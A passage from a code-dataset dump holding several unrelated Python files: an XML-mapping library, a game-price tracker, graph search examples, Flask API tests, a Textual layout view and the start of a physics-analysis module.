**kwargs):\n self.namespace = kwargs.get('namespace')\n self.value_type = kwargs.get('value_type', str)\n self.required = kwargs.get('required', False)\n self.attach = kwargs.get('attach')\n\n def __call__(self, f):\n f.metadata = self\n\n return f\n\n def __str__(self):\n return ', '.join('%s=%s' % (x, y) for x, y in self.__dict__.iteritems())\n\nclass Element(object):\n \"\"\" Element decorator.\n\n This decorator represents an xml element.\n\n Examples of options.\n\n @Element(namespace='ns')\n def test(self): pass\n\n <ns:test/>\n\n @Element(output_list=True)\n def test(self): pass\n\n <test>1</test>\n <test>2</test>\n\n @Element(child_tag='item', child_namespace='ns')\n def test(self): pass\n\n <test>\n <ns:item>1</ns:item>\n </test>\n\n @Element(attr='value')\n def test(self): pass\n\n <test value=\"1\"/>\n\n @Element(path='/hello/once/only', nsmap={'once': 'ns'})\n def test(self): pass\n\n <hello>\n <ns:once>\n <only>\n <test>1</test>\n </only>\n </ns:once>\n </hello>\n\n # NOTE: if store_value is present it will be the only property used\n class Test(xml.XMLDocument):\n @Element(store_value=True)\n def test(self): pass\n\n <Test>1</Test>\n\n Attributes:\n namespace: A str namespace identifier.\n output_list: A bool flag denoting whether the element has multiple children. Default: False\n child_tag: A str value to create an element to wrap the value in.\n child_namespace: A str namespace identifier for child_tag.\n attr: A str value to name the attribute to hold the value.\n path: A str path to nest the element under.\n nsmap: A dict namespace map for the path.\n value_type: A type that the element will hold. 
Default: str\n store_value: A bool flag denoting that the element's contents will be the value.\n minimum: An int setting the minimum number of items.\n maximum: An int setting the maximum number of items.\n \"\"\"\n def __init__(self, **kwargs):\n self.namespace = kwargs.get('namespace')\n self.output_list = kwargs.get('output_list', False)\n self.child_tag = kwargs.get('child_tag')\n self.child_namespace = kwargs.get('child_namespace')\n self.combine = kwargs.get('combine', False)\n self.attr = kwargs.get('attr')\n self.path = kwargs.get('path')\n self.nsmap = kwargs.get('nsmap')\n self.value_type = kwargs.get('value_type', str)\n self.store_value = kwargs.get('store_value', False)\n self.minimum = kwargs.get('minimum', 1)\n self.maximum = kwargs.get('maximum')\n\n def __call__(self, f):\n f.metadata = self\n\n return f\n\n def __str__(self):\n return ', '.join('%s=%s' % (x, y) for x, y in self.__dict__.iteritems())\n\nclass XMLDocumentMarkupType(type):\n \"\"\" XMLDocumentMarkupType.\n\n This type must be used with XMLDocument class to create xml documents. \n This metaclass collects the elements and attributes from properties\n and attaches them to the class.\n \"\"\"\n def __new__(mcs, name, bases, dct):\n def fget(key):\n def fget_wrapper(self):\n return getattr(self, '__%s' % (key,), None)\n\n return fget_wrapper\n\n def fset(key):\n def fset_wrapper(self, value):\n setattr(self, '__%s' % (key,), value)\n\n return fset_wrapper\n\n attributes = {}\n elements = {}\n store_value = None\n\n for key, value in dct.iteritems():\n if hasattr(value, 'metadata'):\n metadata = value.metadata\n\n if isinstance(metadata, Element):\n if metadata.store_value and store_value is None:\n store_value = key\n \n elements[key] = metadata\n else:\n attributes[key] = metadata\n\n dct[key] = property(fget(key), fset(key))\n\n cls = super(XMLDocumentMarkupType, mcs).__new__(mcs, name, bases, dct)\n\n # Set default values for the properties\n for key, value in dct.iteritems():\n if hasattr(value, 'metadata'):\n metadata = value.metadata\n\n if metadata.output_list:\n setattr(cls, key, [])\n else:\n setattr(cls, key, None)\n\n cls.attributes = attributes\n cls.elements = elements\n cls.store_value = store_value\n\n return cls\n\n# Error definitions\nclass XMLParseError(Exception):\n pass\n\nclass ValueConversionError(Exception):\n pass\n\nclass MissingNamespaceError(Exception):\n pass\n\nclass MismatchedTypeError(Exception):\n pass\n\nclass ValidationError(Exception):\n pass\n\nclass XMLDocument(object):\n \"\"\" XMLDocument class.\n \n This class must be inherited by a subclass. This works in conjunction with\n XMLDocumentMarkupType. 
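Subclasses must set __metaclass__ = XMLDocumentMarkupType so that the decorated methods are collected into tracked properties, as in the Car example below.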
Element and attribute decorators can be added to \n method definitions to create a pseudo XML schema.\n\n class Car(XMLDocument):\n __metaclass__ = XMLDocumentMarkupType\n\n def __init__(self, **kwargs):\n super(Car, self).__init__(**kwargs)\n\n @Attribute()\n def color(self): pass\n\n @Element()\n def engine(self): pass\n\n c = Car(color='blue', engine='V8')\n\n print c.xml()\n\n <Car color=\"blue\">\n <engine>V8</engine>\n </Car>\n\n Attributes:\n namespace: A str namespace identifier for the root element.\n nsmap: A dict mapping namespace identifiers to namespace urls.\n tag: A str value to be substituted for the class name as the root element name.\n translator: A Translator to be used in converting names.\n **kwargs: A dict of default property values.\n \"\"\"\n def __init__(self, namespace=None, nsmap=None, tag=None, translator=None, **kwargs):\n self.namespace = namespace\n self.nsmap = nsmap\n self.tag = tag\n self.translator = translator\n\n for key, value in kwargs.iteritems():\n if hasattr(self, key):\n setattr(self, key, value)\n\n @classmethod\n def from_xml(cls, data):\n doc = cls()\n\n try:\n tree = etree.fromstring(data)\n except Exception:\n raise XMLError('Failed to parse xml')\n\n doc.parse_xml(tree)\n\n return doc\n\n @classmethod\n def from_element(cls, element, translator):\n doc = cls()\n\n doc.translator = translator\n\n doc.parse_xml(element)\n\n return doc\n\n def validate(self):\n \"\"\" Validates the property values against their definitions.\n\n Element bounds are validated as well as attribute requirements.\n\n Raises:\n ValidationError: An error occurred validating one of the properties.\n \"\"\"\n for name, metadata in self.attributes.iteritems():\n if metadata.required:\n value = getattr(self, name)\n\n if value is None:\n raise ValidationError('%s Attribute %s is required' %\n (self.__class__.__name__, name,))\n\n for name, metadata in self.elements.iteritems():\n # Check property that stores a list\n if metadata.output_list:\n value = getattr(self, name)\n\n # Check the minimum\n if metadata.minimum > 0:\n if not isinstance(value, (list, tuple)):\n raise ValidationError('%s Element %s was expecting a '\n 'list or tuple of values' % (self.__class__.__name__, name,))\n elif value is None or len(value) < metadata.minimum:\n raise ValidationError('%s Element %s requires a minimum '\n 'of %s values' % (self.__class__.__name__, name, metadata.minimum))\n\n # Check the maximum\n if metadata.maximum is not None:\n if len(value) > metadata.maximum:\n raise ValidationError('%s Element %s requires max %s'\n ' values, %s were provided' %\n (self.__class__.__name__, name, metadata.maximum, len(value)))\n else:\n # Check if a single value is required\n if metadata.minimum > 0:\n value = getattr(self, name)\n\n if value is None:\n raise ValidationError('%s Element %s requires at least '\n 'one value' % (self.__class__.__name__, name,))\n elif isinstance(value, (list, tuple)):\n raise ValidationError('%s Element %s was expecting a '\n 'single value' % (self.__class__.__name__, name,))\n\n def __append_value(self, name, node, metadata):\n \"\"\" Appends a value to a property that stores a list.\n \n Args:\n name: A str name of the property.\n node: A etree.Element whose value will be converted and stored.\n metadata: A Element/Attribute of the property being stored.\n \"\"\"\n # Check for an existing list or create a new one\n values = getattr(self, name)\n\n if values is None:\n values = []\n\n # Convert etree.Element to XMLDocument\n if issubclass(metadata.value_type, XMLDocument):\n value = 
metadata.value_type.from_element(node, self.translator)\n else:\n try:\n value = metadata.value_type(node.text)\n except ValueError:\n raise ValueConversionError('Could not convert from %s to %s' %\n (type(node.text), metadata.value_type))\n\n values.append(value)\n\n setattr(self, name, values)\n\n def __store_value(self, raw_name, name, node, metadata):\n \"\"\" Stores a node in a property.\n\n Args:\n raw_name: A str unformatted name for the node.\n name: A str formatted name for the node.\n node: A etree.Element whose value will be stored.\n metadata: An Element/Attribute associated with the property.\n \"\"\"\n logger.debug('Storing value \"%s\", \"%s\", \"%s\"', name, node.tag, metadata)\n\n # Process a list or single value\n if metadata.output_list:\n self.__append_value(name, node, metadata)\n else:\n # Check if a variable typed value is being stored.\n if isinstance(metadata.value_type, (list, tuple)):\n try:\n target = [x for x in metadata.value_type if x.__name__ == raw_name][0]\n except IndexError:\n raise XMLParseError('Failed to find value_type for {0}'.format(raw_name))\n\n value = target.from_element(node, self.translator)\n elif issubclass(metadata.value_type, XMLDocument):\n value = metadata.value_type.from_element(node, self.translator)\n else:\n value = metadata.value_type(node.text)\n\n setattr(self, name, value)\n\n def __match_parent(self, node):\n \"\"\" Walks up the XML tree to find a parent that is a known property.\n\n Args:\n node: A etree.Element that is the starting node.\n\n Return:\n A tuple containing the etree.Element and Element of the parent.\n \"\"\"\n parent = node\n parent_element = None\n parent_metadata = None\n\n while True:\n parent = parent.getparent()\n\n if parent is None:\n break\n\n if parent.tag in self.elements:\n metadata = self.elements[parent.tag]\n\n if (metadata.child_tag is not None and\n metadata.child_tag == node.tag):\n parent_element = parent\n \n parent_metadata = metadata\n\n break\n\n return parent_element, parent_metadata\n\n def __set_property(self, name, value, metadata):\n \"\"\" Converts and stores a value in a property.\n\n Args:\n name: A str name of the property.\n value: A str value to be stored.\n metadata: An Element/Attribute that belongs to the property.\n \"\"\"\n try:\n value = metadata.value_type(value)\n except ValueError:\n raise ValueConversionError('Could not convert from %s to %s' %\n (type(value), metadata.value_type))\n\n setattr(self, name, value)\n\n def __match_element_value_type(self, tag):\n \"\"\" Find element by its value_type.\n\n Args:\n tag: A str name of the element.\n\n Return:\n A tuple including the name of the property and its related metadata.\n \"\"\"\n for name, metadata in self.elements.iteritems():\n candidates = metadata.value_type\n\n if not isinstance(candidates, (list, tuple)):\n candidates = [candidates]\n\n for c in candidates:\n if c.__name__ == tag:\n return name, metadata\n\n return None, None\n\n def parse_xml(self, root):\n \"\"\" Parses an XML document according to the class definition.\n\n Args:\n root: An etree.Element being the root of the document.\n \"\"\"\n # Remove the namespace\n cls_name = re.sub('^{.*}', '', root.tag)\n\n # Validate that we're parsing the correct class\n if not (cls_name == self.__class__.__name__ or\n (self.tag is not None and cls_name == self.tag)):\n raise ValidationError('XML does not match class definition: {} {} {}'.format(cls_name, self.tag, self.__class__.__name__))\n\n logger.debug('%s BEGIN PARSING \"%s\" 
%s', '#'*6, re.sub('^{.*}', '', root.tag), '#'*6)\n logger.debug(etree.tostring(root, pretty_print=True))\n logger.debug('Translator %s', self.translator)\n logger.debug('Known elements %s', self.elements.keys())\n\n # Process all the root attributes\n for name, value in root.attrib.iteritems():\n name = re.sub('^{.*}', '', name)\n\n if self.translator is not None:\n name = self.translator.attribute_to_property(name)\n\n if name in self.attributes:\n metadata = self.attributes[name]\n\n self.__set_property(name, value, metadata)\n\n # Process the XML tree using depth first search\n stack = [root]\n\n while len(stack):\n node = stack.pop()\n\n tag = node.tag\n\n name = re.sub('^{.*}', '', tag)\n \n # Translate the name if needed\n if self.translator is not None:\n trans_name = self.translator.element_to_property(name)\n else:\n trans_name = name\n \n logger.debug('Processing element \"%s\" (%s)', trans_name, name)\n\n # On non-root nodes check for attributes and store their values.\n if node != root:\n for atrans_name, value in node.attrib.iteritems():\n if self.translator is not None:\n atrans_name = self.translator.attribute_to_property(atrans_name)\n\n if atrans_name in self.attributes:\n metadata = self.attributes[atrans_name]\n\n self.__set_property(atrans_name, value, metadata)\n\n # Check if the current node is defined in the class\n if trans_name in self.elements:\n metadata = self.elements[trans_name]\n\n logger.debug('Element \"%s\" is a known property %s', trans_name, metadata)\n\n # Process a property value that is stored as an attribute.\n if metadata.attr is not None:\n if metadata.attr in node.attrib:\n value = node.attrib[metadata.attr]\n\n self.__set_property(node.tag, value, metadata)\n elif (metadata.child_tag is not None or\n # Process child tags or multiple child tags\n (metadata.output_list and\n issubclass(metadata.value_type, XMLDocument) and\n metadata.path is not None) or\n isinstance(metadata.value_type, (list, tuple))):\n for c in node.getchildren():\n stack.append(c)\n else:\n self.__store_value(name, trans_name, node, metadata)\n else:\n # Node is not a known property we try to process it according\n # to the rules or we just add it's children to the stack.\n logger.debug('Handling unknown element \"%s\"', name)\n\n match_trans_name, match_metadata = self.__match_element_value_type(name)\n\n logger.debug('Match element by value_type \"%s\": \"%s\"', match_trans_name, match_metadata)\n\n # Search for a defined element whos value_type matches the nodes\n # name. 
This is a case where value_type may accept multiple types.\n if match_trans_name is not None:\n self.__store_value(name, match_trans_name, node, match_metadata)\n else:\n handled = False\n\n # Check to see if the an Element with store_value has been\n # defined, and the value of the node should be stored.\n for ename, emeta in self.elements.iteritems():\n if emeta.store_value:\n children = node.getchildren()\n\n # Special case where the stored value is XML\n if len(children) > 0:\n value = '\\n'.join(etree.tostring(x, pretty_print=True) for x in children)\n\n setattr(self, ename, value)\n else:\n setattr(self, ename, node.text)\n\n handled = True\n\n break\n\n if not handled:\n # Last resort, run up the tree searching for a parent\n # who can store the value\n parent_element, parent_metadata = self.__match_parent(node)\n\n if parent_element is not None:\n self.__store_value(name, parent_element.tag, node, parent_metadata)\n else:\n # End of the line just append the child nodes to the\n # stack\n for c in node.getchildren():\n stack.append(c)\n\n logger.debug('%s END PARSING \"%s\" %s', '#'*6, re.sub('^{.*}', '', root.tag), '#'*6)\n\n def __generate_name(self, name, namespace, metadata=None):\n \"\"\" Generate an Element/Attribute name.\n\n If a namespace is provided make sure it is present in the classes nsmap.\n\n Args:\n name: A str base name.\n namespace: A str namespace identifier.\n metadata: A Element/Attribute associated to the property\n\n Return:\n A str formatted Element/Attribute name\n\n Raises:\n MissingNamespaceError: The namespace is not present in the classes nsmap.\n \"\"\"\n new_name = name\n\n if metadata is not None and self.translator is not None:\n if isinstance(metadata, Element):\n new_name = self.translator.property_to_element(name)\n else:\n new_name = self.translator.property_to_attribute(name)\n\n if namespace is None:\n return new_name\n\n try:\n return '{%s}%s' % (self.nsmap[namespace], new_name)\n except TypeError:\n return new_name\n except KeyError:\n raise MissingNamespaceError('Namespace %s was not found in the namespace map' %\n (namespace,))\n\n def __generate_element(self, parent, name, value, metadata, cache):\n \"\"\" Creates a new element.\n \n Args:\n parent: An etree.Element that will be the parent of the new node.\n name: A str name of the new node.\n value: An object whos value will be stored.\n metadata: An Element/Attribute associated with the property.\n cache: A dict that will contain all the new nodes.\n\n Return:\n A new etree.Element.\n \"\"\"\n if value is None:\n return None\n\n if isinstance(value, XMLDocument):\n if self.translator is not None:\n value.translator = self.translator\n\n child_element = value.generate_xml()\n\n parent.append(child_element)\n else:\n new_name = self.__generate_name(name, metadata.namespace, metadata)\n\n new_element = etree.SubElement(parent, new_name)\n\n if metadata.attr is not None:\n new_element.set(metadata.attr, value)\n else:\n new_element.text = str(value)\n\n cache[name] = new_element\n\n def generate_xml(self):\n \"\"\" Generate XML from class definition.\n\n Process the classes elements and attributes that have been declard to\n create an XML document.\n\n \"\"\"\n # Validate all the document constraints\n self.validate()\n\n # Generate our root nodes name\n cls_name = self.__class__.__name__\n\n if self.tag is not None:\n cls_name = self.tag\n\n cls_name = self.__generate_name(cls_name, self.namespace)\n\n root = etree.Element(cls_name, nsmap=self.nsmap)\n\n cache = {}\n\n # Process all of the 
declared elements\n for name, metadata in self.elements.iteritems():\n parent = root\n\n # Contents of the root node will be only this value\n if metadata.store_value:\n value = getattr(self, name)\n\n root.text = value\n\n break\n\n # Create a path if declared\n if metadata.path is not None:\n for s in metadata.path.split('/'):\n if s != '':\n new_s = s\n\n if (metadata.nsmap is not None and\n s in metadata.nsmap):\n new_s = self.__generate_name(s, metadata.nsmap[s], metadata)\n\n parent = etree.SubElement(parent, new_s)\n\n cache[s] = parent\n\n if metadata.attr is not None:\n value = getattr(self, name)\n\n self.__generate_element(parent, name, value, metadata, cache)\n elif metadata.child_tag is not None:\n value = getattr(self, name)\n \n new_name = self.__generate_name(name, metadata.namespace, metadata)\n\n new_element = etree.SubElement(parent, new_name)\n\n cache[name] = new_element\n\n if not metadata.output_list:\n value = [value]\n \n if value is not None:\n for v in value:\n self.__generate_element(new_element, metadata.child_tag, v, metadata, cache)\n elif metadata.output_list:\n value = getattr(self, name)\n\n if value is not None:\n for v in value:\n self.__generate_element(parent, name, v, metadata, cache)\n else:\n value = getattr(self, name)\n\n self.__generate_element(parent, name, value, metadata, cache)\n\n # Process the attributes last since they may be attached to nodes\n # created by Elements that declared path values.\n for name, metadata in self.attributes.iteritems():\n value = getattr(self, name)\n\n if value is None:\n continue\n\n name = self.__generate_name(name, metadata.namespace, metadata)\n\n if metadata.attach is not None:\n if metadata.attach in cache:\n cache[metadata.attach].set(name, str(value))\n else:\n root.set(name, str(value))\n\n return root\n\n def xml(self, pretty_print=False):\n \"\"\" Generate str XML document from etree.Element. 
\"\"\"\n return etree.tostring(self.generate_xml(), pretty_print=True)\n","sub_path":"cwt/wps_lib/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":26059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"421458348","text":"from datetime import datetime\n\nfrom db import DbUtil\nfrom extractor import ListingExtractor\nfrom model import Game, Listing\nfrom currency import CurrencyConverter\n\n\nclass ListingTracker():\n\n def __init__(self, db_name):\n self.db_util = DbUtil(db_name)\n\n self.countries = self.db_util.list_countries()\n self.extractor = ListingExtractor()\n self.existing_games = self.db_util.list_games()\n self.date = datetime.today().date()\n\n def save_listings(self):\n self.update_currency_values()\n\n for country in self.countries:\n self.save_country_listings(country)\n\n def update_currency_values(self):\n\n currency_codes = self.db_util.list_currency_codes()\n converter = CurrencyConverter()\n\n for code in currency_codes:\n try:\n new_usd_rate = converter.get_conversion_rate(currency_code=code, base='USD')\n self.db_util.update_currency_usd_conversion_rate(code, new_usd_rate)\n except KeyError as missing_key:\n print(f\"Could not update conversion rate for currency {missing_key}\")\n\n def save_country_listings(self, country):\n\n print(f\"Extracting listings from: [{country.name}]\")\n country_new_listings = self.extractor.extract_listings(country.eshop_url)\n\n for new_listing in country_new_listings:\n self.save_country_listing(new_listing, country)\n\n def save_country_listing(self, new_listing, country):\n game = self.find_game_by_title(new_listing[\"game_title\"])\n\n new_listing_usd_value = self.calculate_usd_value(new_listing[\"price\"], country)\n\n if game:\n if game.last_updated != self.date or new_listing_usd_value < game.min_price:\n self.update_game_min_price(game, new_listing_usd_value, country)\n else:\n game = self.create_new_game(new_listing, new_listing_usd_value, country)\n\n listing = Listing(original_value=new_listing[\"price\"],\n usd_value=new_listing_usd_value,\n date=self.date,\n game_id=game,\n country_id=country)\n\n self.db_util.save(listing)\n\n def update_game_min_price(self, game, new_listing_usd_value, country):\n game.min_price = new_listing_usd_value\n game.min_price_country_id = country\n game.last_updated = self.date\n\n self.db_util.save(game)\n\n def calculate_usd_value(self, original_value, country):\n return original_value / country.currency_usd_conversion\n\n def create_new_game(self, listing, price, country):\n game = Game(title=listing[\"game_title\"],\n min_price=price,\n min_price_country_id=country,\n last_updated=self.date)\n\n game.id = self.db_util.save(game)\n self.existing_games.append(game)\n\n return game\n\n def find_game_by_title(self, game_title):\n for existing_game in self.existing_games:\n if existing_game.title == game_title:\n return existing_game\n\n return None\n","sub_path":"prices_manager/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"579222601","text":"from queue import Queue\n\nfrom graph import Graph\n\ng = Graph()\n\ng.edges = {\n 'A': ['B', 'C', 'G'],\n 'B': ['A', 'C', 'D'],\n 'C': ['A', 'B'],\n 'D': ['B', 'F', 'E'],\n 'E': ['D', 'F'],\n 'F': ['D', 'E'],\n 'G': ['A', 'H'],\n 'H': ['G'],\n}\n\n\ndef dfs(graph: Graph, source: str, target: str):\n \"\"\"\n Given a graph and a source node, find a 
target using Depth-first search\n\n Great for traversing directed acyclic graphs, and thus job scheduling.\n \"\"\"\n visited = [source]\n path = []\n steps = 1\n while visited:\n node = visited.pop()\n if node == target:\n print(f'Found {target} in {steps} steps')\n return\n if node in path:\n continue\n path.append(node)\n for neighbour in graph.neighbours(node):\n visited.append(neighbour)\n steps += 1\n\n\ndef bfs(graph: Graph, source: str, target: str):\n \"\"\"\n Given a graph and a source node, find a target using breadth-first search\n\n Also known as 'flood fill', this is good for searching out and finding paths,\n and can be used in generating maps etc.\n \"\"\"\n frontier = Queue()\n frontier.put(source)\n visited = {source: True}\n steps = 1\n while not frontier.empty():\n current = frontier.get()\n if current == target:\n print(f'Found {target} in {steps} steps')\n break\n for next_item in graph.neighbours(current):\n if next_item not in visited:\n frontier.put(next_item)\n visited[next_item] = True\n steps += 1\n\ndfs(g, 'A', 'F')\nbfs(g, 'A', 'F')","sub_path":"bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"143574431","text":"import os\nimport json\nimport pytest\nfrom app import create_app, db\n\n\n@pytest.fixture\ndef app():\n app = create_app(config_name=\"testing\")\n with app.app_context():\n # create all tables\n db.create_all()\n yield app\n with app.app_context():\n # drop all tables\n db.session.remove()\n db.drop_all()\n\n@pytest.fixture\ndef test_alert():\n return {'title': 'test', 'message': 'fun test!'}\n\n\nclass TestNudge(object):\n\n\n def test_alert_creation(self, app, test_alert):\n \"\"\"Test API can create an alert (POST request).\"\"\"\n res = app.test_client().post('/alerts/', data=test_alert)\n assert res.status_code == 201\n assert 'test' in str(res.data)\n\n def test_api_can_get_all_alerts(self, app, test_alert):\n \"\"\"Test API can get all alerts (GET request).\"\"\"\n res = app.test_client().post('/alerts/', data=test_alert)\n assert res.status_code == 201\n res = app.test_client().get('/alerts/')\n assert res.status_code == 200\n assert 'test' in str(res.data)\n\n def test_api_can_get_alert_by_id(self, app, test_alert):\n \"\"\"Test API can get a single alert by using its id.\"\"\"\n rv = app.test_client().post('/alerts/', data=test_alert)\n assert rv.status_code == 201\n result_in_json = json.loads(rv.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n result = app.test_client().get(\n '/alerts/{}'.format(result_in_json['id']))\n assert result.status_code == 200\n assert 'test' in str(result.data)\n\n def test_alert_can_be_edited(self, app, test_alert):\n \"\"\"Test API can edit an existing alert. 
(PUT request)\"\"\"\n rv = app.test_client().post(\n '/alerts/',\n data={'title': 'book idea', 'message': 'Eat, pray and love'})\n assert rv.status_code == 201\n rv = app.test_client().put(\n '/alerts/1',\n data={\n \"message\": \"Dont just eat, but also pray and love :-)\"\n })\n assert rv.status_code == 200\n results = app.test_client().get('/alerts/1')\n assert 'Dont just eat' in str(results.data)\n\n def test_edited_alert_must_have_title_and_message(self, app, test_alert):\n rv = app.test_client().post('/alerts/', data=test_alert)\n assert rv.status_code == 201\n rv = app.test_client().put(\n '/alerts/1',\n data={\n \"message\": \"\",\n \"title\": \"\"\n })\n assert rv.status_code == 500\n \n\n def test_alert_deletion(self, app, test_alert):\n \"\"\"Test API can delete an existing alert. (DELETE request).\"\"\"\n rv = app.test_client().post(\n '/alerts/',\n data={'message': 'Eat, pray and love', 'title': 'movie idea'})\n assert rv.status_code == 201\n res = app.test_client().delete('/alerts/1')\n assert res.status_code == 200\n # Test to see if it exists, should return a 404\n result = app.test_client().get('/alerts/1')\n assert result.status_code == 404","sub_path":"test_nudge.py","file_name":"test_nudge.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299886619","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom time import time\nimport logging\nfrom typing import Optional, Tuple, TYPE_CHECKING\n\nfrom rich.console import Console, ConsoleOptions, RenderResult\nfrom rich.layout import Layout\nfrom rich.region import Region as LayoutRegion\nfrom rich.repr import rich_repr, RichReprResult\nfrom rich.segment import Segments\n\nfrom . 
import events\nfrom ._context import active_app\nfrom .geometry import Dimensions, Region\nfrom .message import Message\nfrom .message_pump import MessagePump\nfrom .widget import Widget, UpdateMessage\nfrom .widgets.header import Header\n\nif TYPE_CHECKING:\n from .app import App\n\nlog = logging.getLogger(\"rich\")\n\n\nclass NoWidget(Exception):\n pass\n\n\nclass View(ABC, MessagePump):\n @property\n def app(self) -> \"App\":\n return active_app.get()\n\n @property\n def console(self) -> Console:\n return active_app.get().console\n\n def __rich_console__(\n self, console: Console, options: ConsoleOptions\n ) -> RenderResult:\n return\n yield\n\n @abstractmethod\n async def mount(self, widget: Widget, *, slot: str = \"main\") -> None:\n ...\n\n async def mount_all(self, **widgets: Widget) -> None:\n for slot, widget in widgets.items():\n await self.mount(widget, slot=slot)\n\n async def forward_input_event(self, event: events.Event) -> None:\n pass\n\n\n@rich_repr\nclass LayoutView(View):\n layout: Layout\n\n def __init__(\n self,\n layout: Layout = None,\n name: str = \"default\",\n title: str = \"Layout Application\",\n ) -> None:\n self.name = name\n self.title = title\n if layout is None:\n layout = Layout()\n layout.split_column(\n Layout(name=\"header\", size=3, ratio=0),\n Layout(name=\"main\", ratio=1),\n Layout(name=\"footer\", size=1, ratio=0),\n )\n layout[\"main\"].split_row(\n Layout(name=\"left\", size=30, visible=True),\n Layout(name=\"body\", ratio=1),\n Layout(name=\"right\", size=30, visible=False),\n )\n self.layout = layout\n self.mouse_over: MessagePump | None = None\n self.focused: Widget | None = None\n self.size = Dimensions(0, 0)\n self._widgets: set[Widget] = set()\n super().__init__()\n self.enable_messages(events.Idle)\n\n def __rich_repr__(self) -> RichReprResult:\n yield \"name\", self.name\n\n def __rich_console__(\n self, console: Console, options: ConsoleOptions\n ) -> RenderResult:\n width, height = self.size\n segments = console.render(self.layout, options.update_dimensions(width, height))\n yield from segments\n\n def get_widget_at(self, x: int, y: int) -> Tuple[Widget, LayoutRegion]:\n for layout, (region, render) in self.layout.map.items():\n if Region(*region).contains(x, y):\n if isinstance(layout.renderable, Widget):\n return layout.renderable, region\n else:\n break\n raise NoWidget(f\"No widget at ${x}, ${y}\")\n\n async def on_message(self, message: Message) -> None:\n log.debug(\"on_message %r\", repr(message))\n if isinstance(message, UpdateMessage):\n widget = message.sender\n if widget in self._widgets:\n for layout, (region, render) in self.layout.map.items():\n if layout.renderable is widget:\n assert isinstance(widget, Widget)\n update = widget.render_update(region.x, region.y)\n segments = Segments(update)\n self.console.print(segments, end=\"\")\n\n # async def on_create(self, event: events.Created) -> None:\n # await self.mount(Header(self.title))\n\n async def mount(self, widget: Widget, *, slot: str = \"main\") -> None:\n self.layout[slot].update(widget)\n await self.app.add(widget)\n widget.set_parent(self)\n await widget.post_message(events.Mount(sender=self))\n self._widgets.add(widget)\n\n async def set_focus(self, widget: Optional[Widget]) -> None:\n log.debug(\"set_focus %r\", widget)\n if widget == self.focused:\n return\n\n if widget is None:\n if self.focused is not None:\n focused = self.focused\n self.focused = None\n await focused.post_message(events.Blur(self))\n elif widget.can_focus:\n if self.focused is not None:\n 
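# a new widget is gaining focus; blur whichever widget currently holds it first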
await self.focused.post_message(events.Blur(self))\n if widget is not None and self.focused != widget:\n self.focused = widget\n await widget.post_message(events.Focus(self))\n\n # async def on_startup(self, event: events.Startup) -> None:\n # await self.mount(Header(self.title), slot=\"header\")\n\n async def layout_update(self) -> None:\n if not self.size:\n return\n width, height = self.size\n region_map = self.layout._make_region_map(width, height)\n for layout, region in region_map.items():\n if isinstance(layout.renderable, Widget):\n await layout.renderable.post_message(\n events.Resize(self, region.width, region.height)\n )\n self.app.refresh()\n\n async def on_resize(self, event: events.Resize) -> None:\n self.size = Dimensions(event.width, event.height)\n await self.layout_update()\n\n async def _on_mouse_move(self, event: events.MouseMove) -> None:\n try:\n widget, region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n if self.mouse_over is not None:\n try:\n await self.mouse_over.post_message(events.Leave(self))\n finally:\n self.mouse_over = None\n else:\n if self.mouse_over != widget:\n try:\n if self.mouse_over is not None:\n await self.mouse_over.post_message(events.Leave(self))\n if widget is not None:\n await widget.post_message(\n events.Enter(self, event.x - region.x, event.y - region.y)\n )\n finally:\n self.mouse_over = widget\n await widget.post_message(\n events.MouseMove(\n self,\n event.x - region.x,\n event.y - region.y,\n event.button,\n event.shift,\n event.meta,\n event.ctrl,\n )\n )\n\n async def forward_input_event(self, event: events.Event) -> None:\n if isinstance(event, (events.MouseDown)):\n try:\n widget, _region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n await self.set_focus(None)\n else:\n await self.set_focus(widget)\n\n elif isinstance(event, events.MouseMove):\n await self._on_mouse_move(event)\n\n elif isinstance(event, events.MouseEvent):\n try:\n widget, region = self.get_widget_at(event.x, event.y)\n except NoWidget:\n pass\n else:\n await widget.forward_input_event(event)\n elif isinstance(event, (events.MouseScrollDown, events.MouseScrollUp)):\n widget, _region = self.get_widget_at(event.x, event.y)\n scroll_widget = widget or self.focused\n if scroll_widget is not None:\n await scroll_widget.forward_input_event(event)\n else:\n if self.focused is not None:\n await self.focused.forward_input_event(event)\n\n async def action_toggle(self, layout_name: str) -> None:\n visible = self.layout[layout_name].visible\n self.layout[layout_name].visible = not visible\n await self.layout_update()\n","sub_path":"src/textual/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"74368441","text":"import ROOT\nimport math, os\n\nROOT.PyConfig.IgnoreCommandLineOptions = True\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection \nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nclass genpartsusy(Module):\n\tdef __init__(self):#, muonSelection, electronSelection):\n\t\t#self.isMC = isMC\n\t\t#self.isSig = isSig\n\t\t#self.muSel = muonSelection\n\t\t#self.elSel = electronSelection\n\t\tpass\n\tdef beginJob(self):\n\t\tpass\n\tdef endJob(self):\n\t\tpass\n\tdef beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n\t\tself.out = 
